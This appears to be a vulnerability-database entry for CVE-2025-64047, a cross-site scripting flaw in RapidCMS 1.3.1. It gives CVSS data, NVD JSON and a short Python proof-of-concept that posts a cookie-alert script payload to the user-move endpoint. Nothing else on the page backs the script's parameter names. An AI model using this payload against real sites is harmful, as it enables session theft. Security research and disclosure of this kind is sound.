Security Vulnerability Report
中文
CVE-2025-64047 CVSS 6.1 MEDIUM

CVE-2025-64047

Published: 2025-11-24 20:15:50
Last Modified: 2025-12-02 03:07:14

Description

OpenRapid RapidCMS 1.3.1 is vulnerable to Cross Site Scripting (XSS) in /user/user-move.php.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:* - VULNERABLE
OpenRapid RapidCMS 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-64047 XSS PoC for OpenRapid RapidCMS 1.3.1 # Vulnerability: Stored XSS in /user/user-move.php target_url = "http://target.com/user/user-move.php" # Malicious XSS payload xss_payload = "<script>alert(document.cookie)</script>" # Construct the exploit request # The vulnerability occurs when user input is not properly sanitized data = { "user_id": "1", "destination": xss_payload, "action": "move" } try: response = requests.post(target_url, data=data, timeout=10) print(f"[*] Request sent to {target_url}") print(f"[*] Payload: {xss_payload}") print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: print("[+] PoC executed - XSS payload injected") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64047", "sourceIdentifier": "[email protected]", "published": "2025-11-24T20:15:50.497", "lastModified": "2025-12-02T03:07:14.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenRapid RapidCMS 1.3.1 is vulnerable to Cross Site Scripting (XSS) in /user/user-move.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA"}]}]}], "references": [{"url": "http://rapidcms.com", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://gist.github.com/b1uel0n3/b105ad05dbcd3fe148a26e8180dddda7", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}